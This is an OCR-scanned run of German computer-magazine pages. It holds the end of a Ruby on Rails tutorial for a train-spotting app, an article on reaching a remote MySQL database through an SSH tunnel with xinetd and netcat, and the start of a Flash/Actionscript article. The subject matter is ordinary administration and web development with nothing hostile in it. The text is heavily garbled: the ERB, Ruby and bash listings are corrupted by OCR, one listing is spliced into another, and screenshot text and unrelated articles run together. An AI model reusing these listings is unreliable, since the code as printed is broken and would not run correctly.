<d= Link_to "&Uunl;bersicht', trainspots_path 4> 


Listing 7: app/views/ 
trainspots/edit.himl.erb 


<h2>Zugsichtung bearbeiten</h2> 
<h= error_messages_for :trainspot A> 
<ı form_for(atrainspot) do |f| 4> 
<p>Zug oder Loksbr /> 
iz ftext_field :train Ar</p> 
<p>Ort der Aufnahme<br /> 
iz ftext_field :location A></p> 
<p>Datum und Uhrzeit<br /> 
iz f.datetime_select date Z></p> 
<p>Benerkungen<br /> 
iz f.text_area inotes Z></p> 
<p><h= f.submit "AUuml;bernehmen" %></p> 


<h end %> 
<4= Link_to "&Uunl;bersicht', trainspots_path 4> 
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rend des Entwicklungsprozesses vor- 
teilhaft sein kann und den Bildungs- 
prozess der Datenbankstruktur über 
den gesamten Entwicklungszeitraum 
flexibel hält. 

Bei der Erzeugung des Model kann 
man angeben, welche Datenfelder wel- 
chen Typs es selbst und damit die da- 
zugehörige Datenbanktabelle enthal- 
ten soll. Ein Model-Bezeichner — und 
damit der Name der Unterklasse von 
ActiveRecord::Base — wird im Singu- 
lar angegeben. Die Datenbanktabelle 
selbst erhält als Bezeichnung die Plu- 
ralform. Es sind Felder erforderlich, 
die die Bezeichnung des fotografierten 
Zuges (train), den Aufnahmeort (loca- 
tion), Datum und Zeit (date) sowie zu- 
sätzliche Bemerkungen (notes) auf- 
nehmen sollen: 


ruby script/generate model Trainspot train:string 7 
location:string date:datetime notes:text 


Rails erzeugt wieder mehrere Dateien, 
darunter frainspot.rb in app/models. 
Dort findet später der Model-Quelltext 
seinen Platz. Jedes Model erhält seine 
eigene Datei. 

In db/migrate befindet sich nun eine 
Migration. Der automatisch erzeugte 
Dateiname O00I_create_trainspots.rb 
weist darauf hin, dass es sich um die 
erste Migration handelt und mit ihr die 
Tabelle Trainspots erzeugt wird. Der 
Dateiinhalt wurde aus den Datenfeld- 
angaben bei der Erzeugung des Model 
automatisch generiert. Dies kann man 
mit dem Öffnen der Datei nachvollzie- 
hen. Entwickler können beim Erzeu- 
gen eines Model auf die Angabe der 
Datenfelder verzichten und sie direkt 
in die Migration schreiben (siehe Lis- 
ting 5). 

Rails fügt durch t.timestamps der zu 
erzeugenden Tabelle noch die beiden 
Felder created_at und updated_at hin- 
zu, die von Rails selbstständig ge- 
pflegt werden und den Zeitpunkt der 
Erstellung beziehungsweise der jüngs- 
ten Bearbeitung eines Datensatzes fest- 
halten. Außerdem wird automatisch 
das Feld id hinzugefügt, wenn die Mi- 
gration zur Anwendung kommt. Dies 
erfolgt durch rake db:migrate; die Ta- 
belle wird auf Basis der Angaben in 
der Klassenmethode up erzeugt, kon- 
kret in der Datenbank, die dem devel- 
opment-Environment in config/data- 
base.yml zugeordnet ist. Entsprechende 
Ausgaben in der Konsole sollten dies 
bestätigen. 

Das Model Trainspot bringt schon 
alles mit, was für das Schreiben und 
Lesen der Tabelle trainspots nötig ist. 


Es fehlen noch Controller mit Actions 
und Views, die es benutzbar machen. 

Der Controller soll Trainspots hei- 
ßen. Zum Pflegen der Zugsichtungen 
sind optimalerweise folgende Actions 
nötig: Anzeigen aller bisherigen Einträ- 
ge (index), Anzeigen eines Eintrags 
(show), Anlegen eines neuen Eintrags 
(new), Speichern eines neuen Eintrags 
(create), Bearbeiten eines bestehenden 
Eintrags (edit), Speichern eines beste- 
henden Eintrags (update) und Löschen 
eines Eintrags (destroy). Die Generie- 
rung erfolgt über 


ruby script/generate controller Trainspots index 
show new create edit update destroy. 


Rails erzeugt daraufhin die Controller- 
Klasse TrainspotsController in app/ 
controller/trainspots_controller.rb und 
die zu den angegebenen Actions gehö- 
renden Views. 


REST: Arbeit mit 
HTTP-Metoden 


Mit Rails 2.0 hat sich endgültig REST 
(Representational State Transfer, die Ar- 
beit mit den HTTP-Methoden GET, 
POST et cetera) in Rails fest etabliert. 
Dies vereinfacht es, einen Controller 
oder besser ein dahinterstehendes Model 
als REST-konforme Ressource zu be- 
handeln. Die Actions innerhalb des Con- 
trollers werden weiterhin angesprochen, 
allerdings nicht durch den expliziten 
Aufruf einer URL, die deren Bezeichner 
enthält, sondern je nach HTTP-Metho- 
de des Requests an den Controller. Die 
HTTP-Methoden GET, POST, PUT und 
DELETE passen bestens zu den CRUD- 
Actions eines Rails-Controllers, wobei 
Actions abseits von CRUD ebenfalls an- 
gesprochen werden können. 

Um einen Controller RESTful zu 
machen, genügt ein Eintrag in config/ 
routes.rb. Mit map.resources gefolgt 
vom Controller-Bezeichner ist schon 
alles getan. Für Singleton-Ressourcen 
steht map.resource zur Verfügung. Da- 
mit erhalten Entwickler zudem eine 
Menge sogenannter Named Routes, die 
sie in Links oder als URL für Formulare 
nutzen können. 

Wenn map.ressources :trainspots in 
config/routes.rb hinterlegt ist, kann 
man mit rake routes in der Konsole ab- 
fragen, welche Named Routes mit wel- 
chen Actions als Ziel zur Verfügung 
stehen und welche beim Zugriff auf die 
Ressource verwendete HTTP-Request- 
Methode welche Action auslöst. 
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Zur Implementierung der einzelnen 
Methoden in TrainspotsController: 
Wenn man sich vor Augen führt, dass 
jede Instanz eines Rails-Model einen 
Datensatz der gleichnamigen Daten- 
banktabelle repräsentiert und dass die- 
ses Objekt Methoden zum Lesen, 
Schreiben und Löschen eines Daten- 
satzes enthält, sind die Actions schnell 
geschrieben. 

Beim Aufruf der Named Route 
new_trainspot_url oder der URL Atip: 
//localhost:3000/trainspots/new kommt 
die Action TrainspotsController#new 
zum Einsatz. Hier ist lediglich eine 
leere Model-Instanz erforderlich, die 
im dazugehörigen View app/views/ 
trainspots/new.html.erb, das ein Formu- 
lar enthalten soll, mit Daten bestückt 
werden kann. Zu beachten ist hierbei, 
dass durch die bloße Erzeugung einer 
Instanz des Model noch keine Ände- 
rung an der Datenbank stattfindet. 


Leere Model-Instanz mit 
initialisierten Daten 


Wird dieses Formular gesendet und ist 
somit ein POST-Request an den Con- 
troller ergangen, erhält Trainspots- 
Controller#create diese Formularda- 
ten. Diese Action erzeugt wieder eine 
leere Model-Instanz - allerdings mit 
den initialisierten Formulardaten. Erst 
mit der Methode Trainspot#save geht 
der Versuch einher, die Daten in die 
Datenbank zu schreiben. Schlägt er 
fehl — wenn beispielsweise eine not- 
wendige Eingabe fehlt — gibt die Me- 
thode false zurück. In diesem Falle 
wird app/views/trainspots/new/html. 
erb erneut angezeigt, allerdings mit 
den schon eingegebenen Daten und ei- 
ner Fehlermeldung. Letztere kommt 
direkt vom Model, erscheint durch er- 
ror_messages_for im View und ent- 
hält konkrete Angaben zu Art und Ort 
des Fehlers. 

Ähnliches passiert in den Actions 
edit und update, wobei hier der über 
einen Parameter /D an die Action 
übergebene Datensatz erscheint. Die 


Listing 8: app/views/ 
trainspots/show.himl.erb 


<h2>Zugsichtung <%=h Atrainspot.train A></h2> 

<p><b>0rt der Aufnahne:</b><br /> 

<4= h Atrainspot. location A></p> 

<p><b>Datun und Uhrzeit:</b><br /> 

<4= h Atrainspot.date A></p> 

<p><b>Benerkungen:</b><br /> 

<4= h Atrainspot.notes Z></p> 

<p><h= Link_to "Bearbeiten', edit_trainspot_path(atrainspot) 4> | 
<4= link_to "&Uunl;bersicht", trainspots_path A></p> 
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Listing 9: app/views/ 
trainspots/index.html.erb 


<h2>Zugsichtungen</h2> 


<tr> 
sth>Zug oder Lok</th> 
<th>0rt der Aufnahnes/th> 
<th>Datun und Zeits/th> 
<th>Bemerkungen</th> 
<th>s/thr 

<itr> 


<tr 
std><i= h trainspot.train A</td> 


std><i= h trainspot.location A></td> An 


stable? Listing 10 

class TrainspotsController < ApplicationController 
before_filter :find_trainspot, :only => L:edit, :update, :show, :destroy] 
private 
def find_trainspot 


N a = Trainspot.find(paransL:id]) 


std><i= h trainspot.date A></td> 
std><i= h trainspot.notes A></td> 
std><t= Link_to "Anzeigen', trainspot 4> | 


<itr> 
<h end > 
<Itable> 


<h= Link_to "Bearbeiten', edit_trainspot_path(trainspot) 4> | 
<h= Link_to "Entfernen', trainspot, :confirm => "Sind Sie sicher?', :method => :delete A></td> 


<p><h= Link_to "Neue Zugsichtung anlegen", neu_trainspot_path A></p> 


mächtige Klassenmethode find des Mo- 
del, die auch in den Actions show und 
destroy benutzt wird, erhält diesen Pa- 
rameter und gibt den dazugehörigen 
Datensatz als Model-Instanz zurück. 
TrainspotsController#update benutzt 
nicht die Methode save, sondern aktua- 
lisiert den bestehenden Datensatz durch 
update_attributes. In TrainspotsCon- 
troller#index dient find dazu, alle bis- 
herigen Zugsichtungen in der lokalen 
Variable @trainspots zu speichern. 

Ist das Speichern beziehungsweise 
Aktualisieren eines Datensatzes in 
create beziehungsweise update erfolg- 
reich verlaufen, empfiehlt es sich, ei- 
nen HTTP-Redirect durchzuführen, 
beispielsweise auf die Seite aller bis- 
herigen Einträge. Gleiches gilt für die 
Action destroy. Dieser Redirect ver- 
hindert, dass der POST-, PUT- oder 
DELETE-Request auf die Ressource 
durch Aktualisieren der Webseite er- 
neut durchgeführt wird. 

Das schon standardmäßig existie- 
rende Objekt flash ermöglicht es, eine 
Meldung an den Benutzer zu hinterle- 
gen, die diesen Redirect gleichsam 
„überlebt“ und innerhalb des Weiter- 
leitungsziels zur Anzeige kommen 


kann. Da dies Standard in Rails-An- 
wendungen ist, empfiehlt es sich, im 
Layout eine Stelle zu definieren, die 
diese Meldung aufnehmen soll. Mit 
<%= flash[:notice] %> oberhalb des 
yield-Befehls in app/views/layouts/ap- 
plication.html.erb lässt sich das um- 
setzen. 


Form-Element automatisch 
erstellt 


Die Views new und edit zeigen ein For- 
mular zur Dateneingabe. Die Daten 
entstammen einer Model-Instanz. Mit 
dem Helper form_for und dieser In- 
stanz als Parameter erstellt Rails auto- 
matisch das benötigte form-Element in- 
klusive aller benötigten Attribute für 
ein reibungsloses Zusammenwirken 
mit dem Controller. 

Und noch mehr: form_for kann ein 
Block übergeben werden, innerhalb des- 
sen ein Form-Helper-Objekt als Block- 
variable zur Verfügung steht, das über 
Methoden verfügt, mit denen sich die 
einzelnen Formularelemente erzeugen 
lassen. Auch diese werden dank 
form_for mit allen nötigen Attributen 


Trainspotr 


(NAVY) , 5 x 
Neue Zugsichtung anlegen 


Zug oder Lak 
IC 1898 


Ort der Aufnahme 
Stuttgart Hbf 


Datızn und Uhrzeit 


Bermerkimgen 


2008 #4 | April DIE Eee) 


z Metzopoliten auf dem Weg nech 


Anlegen eines Fotos samt 
Kommentar; noch ist die 
Navigation „leer” (Abb. 3). 
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Ruby on Rails | 


Listing 11: app/views 
/#rainspots/_form.himl.erb 


<p>Zug oder Lok<br /> 

<= ftext_field :train Ar</p> 
<p>Ort der Aufnahme<br /> 

<= ftext_field :location A></p> 
<p>Datum und Uhrzeit<hr /> 

<= f.datetime_select date Z></p> 
<p>Benerkungen<br /> 

iz f.text_area inotes Z></p> 


versorgt. Hier sind text_field, text_ 
area und datetime_select (mehrere 
Auswahlfelder zur Datums- und Zeit- 
eingabe) erforderlich; dazu kommt ein 
Submit-Button. Unterhalb des Formu- 
lars verweist ein Link durch die Named 
Route trainspots_path auf die Über- 
sicht, die Action TrainspotControl- 
ler#index (siehe Listing 6 und 7). 

TrainspotsController#show (siehe 
Listing 8) funktioniert ähnlich wie die 
beiden bisherigen Views, nur dass es 
hier ausschließlich ums Anzeigen 
geht. Der Helper h bereitet alle anzu- 
zeigenden Daten HTML-gerecht auf, 
zudem verhindert er Cross-Site Scrip- 
ting durch das Entschärfen von Java- 
script-Anweisungen. 

Die Übersicht aller Zugsichtungen 
besteht aus einer Tabelle. Mit @train- 
spots steht ein Array zur Verfügung, 
dessen Elemente Model-Instanzen sind. 
Eine Iteration erstellt für jede Zugsich- 
tung eine Tabellenzeile. In der rechten 
Spalte befinden sich jeweils Links, mit 
denen ein Datensatz bearbeitet, betrach- 
tet oder gelöscht werden kann (siehe 
Listing 9). Der Rails-Helper link_to 
ermöglicht durch den Parameter con- 
firm, eine besonders gefährliche Ak- 
tion durch eine Nachfrage abzusichern. 
Er erzeugt den nötigen Javascript-Code 
für eine Bestätigungsbox. 

Views für die Actions create, update 
und destroy sind nicht nötig, da diese 


lediglich eine Operation ausführen. 
Die Dateien kann man bedenkenlos 
löschen. 


Don't Repeat Yourself 


Im momentanen Programmcode gibt es 
mehrere Stellen, an denen sich Code 
wiederholt. Der erste Teil dieses Tuto- 
rials soll damit beschlossen werden, 
zwei Features vorzustellen, die zeigen, 
dass Rails gut dabei unterstützt, das 
DRY-Prinzip umzusetzen. 

In TrainspotsController befindet sich 
in den Actions edit, update, show und 
destroy dieselbe Zeile: @trainspot = 
Trainspot find(params[:id]). Mit Filtern 
können Entwickler separate Methoden 
schreiben, die vor oder nach dem Aus- 
führen bestimmter Actions zur Ausfüh- 
rung kommen. Hier geht es um before 
_filter. Listing 10 erhält als Parameter 
die auszuführende Methode und einen 
Array der Actions, bei denen der Filter 
greifen soll. Zu streichen ist deshalb die 
eben genannte Zeile aus den betreffen- 
den Actions. Da die Methoden show 
und edit nun ohne Inhalt sind, kann man 
sie gänzlich aus dem Controller strei- 
chen. Rails führt in diesem Fall nur 
noch den Filter aus und lädt den zuge- 
hörigen View. Der Controller ist wie in 
Listing 10 zu sehen zu ergänzen. 

Eine weitere Stelle, an denen Code 
mehrfach auftritt, lässt sich in den 
Trainspots-Views new.html.erb und 
edit.html.erb finden. Das Formular ist 
in beiden Fällen weitgehend identisch. 
Mit Partials lassen sich gleiche Teile 
von Views auslagern und wiederver- 
wenden. Partials sind Views, deren 
Dateinamen mit einem Underscore be- 
ginnen — eine weitere Rails-Konven- 
tion. In app/views/trainspots/_form. 


Rails 

Ruby on Rails - offizielle Website 
Ruby on Rails (deutsche Seite] 
Rails-Dokumentation 

Railscasts - Screencasts zu Rails 
Rails Usergroup Deutschland 
Editoren und IDEs 

Textmate [Mac OS X) 

E-TextEditor [Windows] 

Netbeans (OS-unabhängig) 
Aptana/RadRails (OS-unabhängig] 
3rdRail (Windows, Mac OS X, Linux) 
Heroku online (OS-unabhängig] 
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www.rubyonrails.org 
www.rubyonrails.de 
api.rubyonrails.org 
www.railscasts.com 


www.rubyonrails-ug.de/ 


macromates.com/ 
www.e-texteditor.com/ 
www.netbeans.org/ 
www.aptana.com/ 
www.codegear.com/products/3rdrail 
heroku.com/ 


Tutorialinhalt 


Teil I: Einrichten der Umgebung, Aufbau 
des Grundlayouts der Website sowie 
Model, Controller und View für das 
Anlegen und Bearbeiten von Loksich- 
tungen 

Teil Il: Datei-Upload, Thumbnail-Erzeugung, 

7 Anlegen eines geschützten Bereichs mit 
Registrierung, dynamische Navigation, 
Geodaten mit Google Maps 

Teil Ill: Startseite mit Fotos aus dem Datenbe- 
stand und Ajaxifizieren der Oberfläche. 
Hinweise zum Deployment 


html.erb sind die identischen Formu- 
larelemente zu sehen (Listing 11). 

In new.html.erb und edit.html.erb 
kann dieser Teil nun jeweils durch 
Rails’ render-Befehl ersetzt werden. 
Hier steht der Name des Partials - ohne 
Underscore. Zudem muss das Formu- 
lar-Objekt als lokale Variable an das 
Partial übergeben werden, damit dies es 
verwenden kann: <%= render :partial 
=> ‚form’, :locals => {:f=> f} %>. 


Fazit 


Bislang lassen sich in Trainspotr zwar 
Zugsichtungen hinterlegen, allerdings 
fehlt noch das Wichtigste: die Fotos. 
Um das Hochladen und das automati- 
sche Anfertigen von Thumbnails soll es 
im nächsten Teil gehen. Außerdem, 
wie Geodaten zu diesen Fotos hinter- 
legt und mit Google Maps angezeigt 
werden können. Es entsteht zudem ein 
geschützter Benutzerbereich und eine 
dynamische Navigationsleiste für die 
linke Seite des Layouts. 

Dabei wird es noch mehr um Migra- 
tions und Routing gehen, das Verwen- 
den von Validatoren und Assoziatio- 
nen. Außerdem um das Einbinden und 
Nutzen von Plug-ins sowie um einige 
Werkzeuge, die Ruby on Rails mit- 
bringt. Der Quelltext zu Trainspotr in 
seiner jetzigen Form steht auf dem 
FTP-Server der iX und unter www. 
trainspotr.de zur Verfügung. Dort 
kann man die Anwendung außerdem 
ausprobieren. (hb) 


DENNY CARL 
ist seit 2001 selbstständiger Webdesig- 


ner und -entwickler in Berlin. 
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Datenbanksicherheit 


nternehmen verwenden häufig 
U Webserver mit zugehöriger Da- 

tenbank bei einem externen Pro- 
vider. Aus Sicherheitsgründen sind dort 
nur die zwingend notwendigen Ports 
für Protokolle wie HTTP (80), HTTPS 
(443) und SSH (22) von außen zugäng- 
lich. Außerdem verbinden sich alle nur 
lokal verwendeten Dienste, zum Bei- 
spiel die Datenbank, mit dem virtuellen 
Interface localhost. Damit entfällt der 
direkte Zugriff von außen auf diese 
Dienste. Insbesondere die Nutzung der 
auf dem externen Server laufenden Da- 
tenbank ist aus dem Unternehmen her- 
aus nicht möglich. 

Einen Weg zur Verwaltung und zum 
Zugriff auf die Datenbank öffnen Web- 
werkzeuge wie PHPMyAdmin. Neben 
der üblichen Anmeldung mit Login und 
Passwort bringt eine HTTP-Authentifi- 
zierung zusätzliche Sicherheit. Oft reicht 
aber dieses Vorgehen für die tägliche 
Arbeit nicht aus. Viele Funktionen bie- 
ten nur Anwendungen mit direkter Ver- 
bindung zur Datenbank. Beispiele dafür 
sind Applikationen wie der MySQL 
Query Browser, automatische Backups 
per mysqldump, statistische Analysen 
mit SPSS direkt auf den Daten sowie 
Skripte für Datamining oder zum Erstel- 
len von Reports. 

Dieser Artikel zeigt Schritt für 
Schritt eine Lösung für das geschilderte 
Dilemma. Sie verwendet einen lokalen 
„Port-Proxy-Server“, der als allgemeiner 
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Dienst die Kommunikation mit der Da- 
tenbank des entfernten Servers über 
eine sichere SSH-Verbindung kapselt 
und zur Verfügung stellt. Zum Aufbau 
eines SSH-Tunnels verwendet man den 
folgenden Befehl: 

ssh -| login-name -N \ 

-L [bind_address:]port:host:hostport remoteServer 


Der Parameter -/ definiert den Nutzerna- 
men, für den auf den entfernten Server 
die Authentifizierung stattfindet. -Z legt 
fest, dass der lokale port, optional ge- 
koppelt an eine IP-Adresse (bind_ 
address), auf dem entfernten Rechner 
remoteServer an die IP-Adresse host 
und den Port hostport weitergeleitet 
wird. Statt IP-Adressen lassen sich Na- 
men angeben; allerdings erfolgt die Auf- 


Client 1 


da 


MySQL 


Query Browser 


Client 2 
& 


mysqldump 


MySQl via SSH-Tunnel nutzen 


Licht am Ende 


Alexander Mas, Steffan Schiewe, 
Bernhard Wellhöfer 


Oft akzeptieren Datenbanken aus Sicherheits- 
gründen Verbindungen nur von lokalen Clients, 
was die Arbeit aus der Ferne übermäßig 
erschwert. Ein automatisch aufgebauter SSH- 
Tunnel bietet in Zusammenarbeit mit xinefd und 
netcat allen Clients sicheren Zugriff von 
entfernten Rechnern. 


lösung von host auf dem Zielrechner. -N 
verhindert das Starten der Login-Shell. 
Beispielhaft hier der Aufruf, um einen 
Tunnel zur MySQL-Datenbank auf dem 
entfernten Server (gebunden dort an lo- 
calhost:3306) aufzubauen: 


ssh -| user-remote -N \ 
-L 12345:localhost:3306 remoteServer 


Ein mysql-Client lässt sich nun etwa so 
via ssh mit der entfernten Datenbank 
db verbinden: 


mysql --port=12345 -h 127.0.0.1 \ 
-user=dbUser --password=dbPasswd db 


Mit der Angabe -h 127.0.0.1 erzwingt 
man die Nutzung einer TCP-Verbin- 
dung über den angegebenen Port - 
üblicherweise verwendet mysql lokal 


Entfernter Server 
nicht-öffentliche Ports 


Unsicheres Netzwerk 
(Internet) 


MySQl-Dateien 


Lokale Datenbankprogramme verbinden sich mit Port 3310, den der xinetd 
mithilfe von netcat und einem SSH-Tunnel an die entfernte Datenbank 


weiterleitet (Abb. 1). 
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immer einen Socket und ignoriert den 
Port-Parameter. Die Werte von --user 
und --password dienen zur Authentifi- 
zierung mit der Datenbank. 


Schlüssel vereinfachen 
SSH-Anmeldung 


Beim erstmaligen Aufbau einer SSH- 
Verbindung für diesen Benutzer zum 
entfernten Server muss der Anwender 
dessen SSH-Fingerprint akzeptieren 
und in der Regel sein Passwort zur An- 
meldung eingeben. Um diese Eingabe 
zu vermeiden und das automatisierte 
Ausführen von Skripten zu erleichtern, 
verwendet man ein Schlüsselpaar zur 
Authentifizierung. Auf die Details geht 
dieser Text nicht ein, Näheres dazu er- 
läutern unter anderem Barret und seine 
Kollegen [1]. 

Nach dem erfolgreichen Einrichten 
der Authentifizierung per Schlüssel 
sollte als Test das Kommando 


ssh -| user-remote remoteServer hostname 


den Befehl hostname auf dem entfern- 
ten Server ohne weitere Rückfrage 


ausführen und den Rechnernamen als 
Resultat ausgeben. 

Mit xinetd und dem als nc aufgerufe- 
nen netcat lässt sich der Aufbau des 
SSH-Tunnels automatisieren und sein 
lokaler Port für Tools wie den MySQL 
Query Browser oder mysgldump einfach 
bereitstellen. Beide Kommandos stehen 
unter Linux in jeder Distribution zur 
Verfügung und können beispielsweise 
bei Debian als Root mit dem Befehl apt- 
get install nc xinetd installiert werden. 

Als einfacher Funktionstest kommt 
der Echo-Dienst zum Einsatz, der alle 
eingehenden Daten liest und sie sofort 
unverändert zurücksendet. Dazu setzt 
man in der Datei /etc/xinetd.d/echo im 
Abschnitt für die TCP-Version den Wert 
disable auf no. Abschließend veranlasst 
/etc/init.d/xinetd reload den Daemon 
zum erneuten Einlesen der Konfigura- 
tionsdateien. 

Für die meisten bekannten Netzdiens- 
te ordnet /etc/services den Portnum- 
mern sprechende Namen zu. Für den 
Echo-Dienst finden sich dort die Port- 
nummer 7 und „echo“ als Name. net- 
stat -anl grep :7 zeigt, ob xinetd den 
Port und damit den Echo-Dienst bereit- 


# default: on 
service server-portproxy-3310 
{ 


port = 
type = 

socket_type = 

wait = 

user = 

server = /opt/portproxy.sh 

server_args = -t remote_server 3306 user_remote 
log_on_success += USERID PID HOST EXIT DURATION 
log_on_failure += USERID HOST ATTEMPT 

disable = 


Log_type 


FILE /tnp/portproxy.xinetd.Log 


Listing 1: Dienstkonfiguration für xinetd 


stellt. Ist dies nicht der Fall, sollten die 
üblichen Logdateien in /var/log Auf- 
schluss über die Ursache geben. 


Kopierer für 


den IP-Verkehr 


In der einfachsten Verwendung nc host 
port öffnet netcat eine TCP-Verbin- 
dung zum angegeben Zielrechner und 
-port. Anschließend kopiert es alle Da- 
ten aus der Standard-Eingabe in die ge- 
öffnete Netzverbindung und umgekehrt 
alles von dort auf die Standard-Ausga- 
be. Mit nc localServerName echo lässt 
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Datenbanksicherheit 


#!/bin/bash 
# Usage: $0 dbServerHost dbServerPort userNameforTunnel 


# prepare Logging 
LOGFILE=/tnp/"basenane $0 .sh'.Log 


function logl) { 
echo 98: $0 >>$LOGFILE 
} 
log start $0 at date’ with arguments -"$0"- 


# find a free port, assign free port to $port 
function getFreePort() { 


while true 
do 

port=$RANDOM 

[ Sport -Lt 1025 ] && continue 

netstat -an | fgrep -q ':"$port || break 
done 


$1 the remote host 
# $2 the remote port 
#83 the remote ssh user 
funetion doWork() { 
# get free local port for the ssh tunnel 
getfreePort 
log free port is $port 


# build tunnel to remote host 


Listing 2: Skript für den automatischen Verbindungsaufbau 


s=1 
while ! netstat -an | grep -q ':"$port 
do 


log waiting for ssh tunnel -$s- 
sleep 1 
s=$(($5 + 1)) 


if [$s -gt 20 ] 
then 
log unable to start ssh tunnel 
exit 1 
fi 
done 
log tunnel built 


# start 1/0 copying 
log start nc copy program for stdin/stdout and Localhost:$port 
nc localhost $port 2>>$LOGFILE 


# the function does the work (see comments inside), arguments: 
# 


log start tunnel to remote host $1 to port Localhost:$2 for user $3 
sch -L 83 -C -L Sport:localhost:$2 -N $1 >> SLOGFILE 2>81 & 


# kill background tunnel 
log killing ssh tunnel 


kill m 
} 


# test arguments: $0 dbServerHost dbServerPort userNameForTunnel 


it [$# -ne 3] 
then 


log 'basenane $0' was called with an illegal argument List: "$9" 


exit 1 
fi 


# do the work 
doWork $1 82 93 


log end of $0 at 'date' 


# wait max up to 20 seconds for the tunnel to start exit O 


sich folglich der von xinetd angebotene 
Echo-Dienst testen. 

Mit xinetd, netcat und dem SSH- 
Tunnel stehen alle Komponenten für 
den Aufbau des „Port Proxy Servers“ 
bereit. Abbildung 1 zeigt schematisch 
den Aufbau und die Funktionsweise. 

Pro entfernte Datenbank existiert auf 
dem „Port-Proxy-Server“ ein Port als 
Stellvertreter, den xinetd bewacht. Ver- 
bindet sich ein lokaler Datenbank-Client 
mit diesem Port, startet der Daemon 
ein Shell-Skript, das einen SSH-Tunnel 
zur entfernten Datenbank öffnet und 
netcat zum Kopieren der Daten von 
dem lokalen Client zur Datenbank und 
zurück startet. 

Listing 1 zeigt beispielhaft die zu- 
gehörige xinetd-Konfigurationsdatei, 
die in /etc/xinetd.d liegen muss. Sie 
legt unter anderem den lokalen Pfad 
zum erwähnten Shell-Skript und des- 
sen Parameter (server und server_ 
args) sowie Logging-Einstellungen 
fest. Eine genaue Erklärung der weite- 
ren Zeilen liefern die zugehörigen Ma- 
nual-Seiten (man xinetd.conf). Damit 
unterschiedliche Proxy-Verbindungen 
zu mehreren Servern möglich sind, 
kann diese Konfiguration dupliziert 
und mit angepasstem Port und Skript- 
parametern gespeichert werden. Wie 
zuvor muss /etc/init.d/xinetd reload 
den xinetd zum erneuten Lesen der 
Konfiguration veranlassen. 

Listing 2 zeigt Auszüge aus dem 
von xinetd gestarteten Shell-Skript, 
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das den SSH-Tunnel und netcat akti- 
viert. Die vollständige Fassung steht 
auf dem iX-Listingserver bereit. Das 
Skript sucht zunächst nach einem 
freien Port größer als 1024, der an- 
schließend die lokale Seite des SSH- 
Tunnels bildet. Da dieser im Hinter- 
grund läuft, wartet das Skript bis zu 
seinem erfolgreichen Start. Mit netcat 
kopiert es dann alle ein- und ausge- 
henden Daten zwischen dem lokalen 
Client und dem SSH-Tunnel. Fügt 
man noch Fehlerprüfungen und Log- 
ging-Funktionen hinzu, entsteht das 
komplette Shell-Skript. So lässt sich 
nun zum Beispiel die entfernte Daten- 
bank sichern: 
mysqldump --port=3310 -h 127.0.0.1 \ 
--user=dbUser --password=dbPasswd db \ 7 

> backup.sql 


Ist der „Port Proxy Server“ eingerich- 
tet, bietet er von jedem Rechner im lo- 
kalen Netz Zugriff auf die entfernten 
Datenbanken. 


Fazit 


Wenn es keinen direkten Zugriff auf 
bestimmte Dienste eines entfernten 
Servers gibt, bietet das hier vorgestellte 
Skript eine einfache und sichere Lö- 
sung, diese aus dem lokalen Netz zu 
verwenden. Im Fall eines Datenbank- 
dienstes auf dem entfernten Server ist 
man dadurch in der Lage, administrative 


Aufgaben zu erledigen oder automati- 
sierte Skripte auszuführen, die eine di- 
rekte Verbindung zur Datenbank benö- 
tigen. Mit kleineren Anpassungen lässt 
sich dieses Verfahren auch für andere 
Dienste einsetzen (ck). 
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Webprogrammierung 


Open-Source-Compiler für Actionscript 


Frei eingeblendet 


Uwe Seimet 


Adobes Flash Player ist ein weit verbreitetes Browser-Plug-in. 
Mit seiner Hilfe lassen sich nicht nur Webanwendungen mit 
Animationen oder Video-Streaming realisieren, sondern in 
Verbindung mit einem geeigneten Server auch Client/Server- 
Anwendungen. Dazu kommen neben Softwarepaketen von 


Adobe freie Werkzeuge infrage. 


auf fast 99 Prozent aller PCs ein 
Flash-Player-Plug-in installiert, 
davon zu einem überwiegenden Teil 
die aktuelle Version 9 (siehe „Online- 
quellen“ [a] — die Quellen finden sich 
im Web unter „iX-Link“). Von einem 


L aut einer Statistik von Adobe ist 
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solch hohen Verbreitungsgrad sind an- 
dere bekannte Browser-Plug-ins — ins- 
besondere Java und der Windows Me- 
dia Player - ein ganzes Stück entfernt. 
Anwendungen für den Flash Player er- 
stellen Programmierer in der Regel 
mit der kommerziellen IDE Flash CS3 


Professional, die nur für Windows und 
Mac OS X verfügbar ist. Flash CS3 
erlaubt sowohl die Gestaltung der gra- 
fischen Elemente einer Webanwen- 
dung als auch die Programmierung 
clientseitiger Logik in der objektorien- 
tierten Programmiersprache Action- 
script, die wie Javascript an den EC- 
MAsScript-Standard angelehnt ist. 

Die Daten einer Flash-Anwendung 
sind in einer vom Flash Player ausführ- 
baren SWF-Datei eingebettet, wobei 
SWF je nach Lesart für Small Web For- 
mat oder Shockwave Flash steht. SWF- 
Dateien sind plattformunabhängig und, 
sofern keine zusätzlichen Daten benötigt 
werden, kann das Browser-Plug-in sie 
ausführen, ohne weitere Ressourcen im 
Netz in Anspruch zu nehmen. Dies trifft 
auf viele mit Flash realisierte Animatio- 
nen zu. Etwas komplizierter ist es bei 
Anwendungen aus dem Multimedia-Be- 
reich. Zwar lassen sich auch Videos in 
eine SWF-Datei integrieren, aber sinn- 
voll ist dies ab einem gewissen Daten- 
volumen nicht mehr, da das Plug-in 
zunächst die gesamte Anwendung mit 
allen Daten herunterladen muss, bevor 
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es ein Video starten kann. Eine bessere 
Lösung ist der progressive Download, 
bei dem der Player die Anfangssequenz 
eines Videos schon abspielt, während 
er fehlende Daten noch im Hintergrund 
lädt. Progressive Downloads lassen 
sich mit einem handelsüblichen Web- 
server realisieren, erlauben ein Umher- 
springen in einem Video jedoch nur 
innerhalb der bereits vom Plug-in gela- 
denen Daten. 

Im Idealfall erfolgt die Übertragung 
von Audio/Videodaten durch einen 
Streaming-Server, der mit dem Flash 
Player in ständigem Kontakt steht. Die- 
ser Server übermittelt die vom Client 
benötigten Daten nahezu in Echtzeit und 
ermöglicht daher auch die Übertragung 
von Live-Veranstaltungen. Innerhalb ei- 
nes vorproduzierten Videos kann der 
Anwender ohne nennenswerte Verzöge- 
rungen vor- und zurückspulen. Profes- 
sionelle Streaming-Server verstehen 
sich aber nicht nur auf die Übermitt- 
lung reiner Video- und Audio-Daten. 
Grundsätzlich lassen sich beliebige Da- 
ten zwischen Server und Flash-Plug-in 
austauschen, somit auch Informationen 
über Methoden-Aufrufe. Damit kann der 
Flash Player Server-Funktionen abru- 
fen oder umgekehrt der Server Funktio- 
nen des Players steuern. Dabei kommt 
